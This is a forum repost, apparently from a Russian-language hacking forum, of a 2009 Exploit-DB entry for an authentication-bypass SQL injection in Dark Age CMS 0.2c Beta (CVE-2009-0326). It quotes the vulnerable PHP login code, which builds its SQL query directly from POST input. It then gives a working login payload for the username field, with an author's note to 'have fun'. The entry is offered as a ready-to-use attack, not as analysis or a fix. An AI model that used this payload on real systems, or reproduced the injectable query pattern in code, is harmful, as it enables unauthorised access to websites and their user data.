Exploit Dark Age CMS 0.2c Beta - Authentication Bypass

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
7758
Проверка EDB
  1. Пройдено
Автор
DARKJOKER
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2009-0326
Дата публикации
2009-01-13
Код:
--+++==================================================================================+++--
--+++====== Dark Age CMS <= v0.2c Beta (Auth Bypass) SQL Injection Vulnerability ======+++--
--+++==================================================================================+++--

[+] Dark Age CMS <= v0.2c Beta (Auth Bypass) SQL Injection Vulnerability
[+] Author: darkjoker
[+] Site  : http://darkjoker.net23.net
[+] Notes : Have fun

[+] Code
[+]	$username = $_POST['username'];
[+]	$user_password = $_POST['password'];
[+]	$password = md5($user_password);
[+]	
[+]	$query = "SELECT * FROM " . ACCOUNTS_TABLE . " WHERE username='$username' AND password = '$password'";
[+]	$result = mysql_query($query) or die('error making query');
[+]	

[+] Login data:

[+] Username: x' OR 'x' = 'x'#
[+] Password: anything

# milw0rm.com [2009-01-13]
 
Источник
www.exploit-db.com

Похожие темы